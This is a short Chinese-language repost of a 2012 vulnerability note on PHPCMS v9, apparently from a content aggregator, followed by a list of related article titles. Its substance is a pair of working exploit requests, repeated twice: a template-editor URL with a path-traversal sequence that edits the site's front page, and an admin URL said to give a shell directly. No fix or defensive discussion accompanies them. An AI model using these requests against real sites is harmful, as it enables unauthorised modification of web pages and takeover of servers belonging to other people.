phpcms v9模版编辑路径穿越漏洞
2012-08-29 11:50
113 查看
by flyh4t
通过如下方式可穿越目录编辑首页
index.php?m=template&c=file&a=edit_file&style=default&dir=wap/…././/…././/…././/…././/&file=index.html&pc_hash=YHgoqn
admin.php?mod=phpcms&file=safe&action=see_code&files=kindle.php 这个页面可以直接getshell
通过如下方式可穿越目录编辑首页
index.php?m=template&c=file&a=edit_file&style=default&dir=wap/…././/…././/…././/…././/&file=index.html&pc_hash=YHgoqn
admin.php?mod=phpcms&file=safe&action=see_code&files=kindle.php 这个页面可以直接getshell
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- PHPCMS v9 文件后缀提取错误代码上传漏洞
- 修改默认模版和插件路径
- 路径遍历与文件读取漏洞以及其修复方案
- Visual Studio Code For Mac 支持 ejs 模版视窗编辑识别为html
- 【模版】并查集 及路径压缩
- aspx暴绝对路径漏洞
- phpcms v9实现修改后台管理登陆路径的简单方法
- NetBeans 7.2 or 8.0 编辑文件时不显示文件路径。
- 加工路径的图形化编辑
- ASP.NET MVC 模版切换 自定义模板路径
- 获取当前模版路径的操作办法,解决…
- eclipse编辑xml文件时提示本地包和类的路径
- [Django]如何使用相对路径加载模版
- phpcms v9多文件上传字段获取文件url路径地址的方法
- Silverlight DataGri列模版,行头图标模版,列头模版,多重表头,,编辑模版,样式
- BIEE物理业务层编辑之后发布路径
- WordPress Ripe HD FLV Player插件SQL注入和多个路径泄露漏洞
- Android 7.0 插卡后APN信息的加载流程、UI界面编辑APN的流程及Android中APN配置相关的漏洞
- 博客编辑上传图片时出现 C:\fakepath\文件路径问题
- phpcms v9中某些默认的文件路径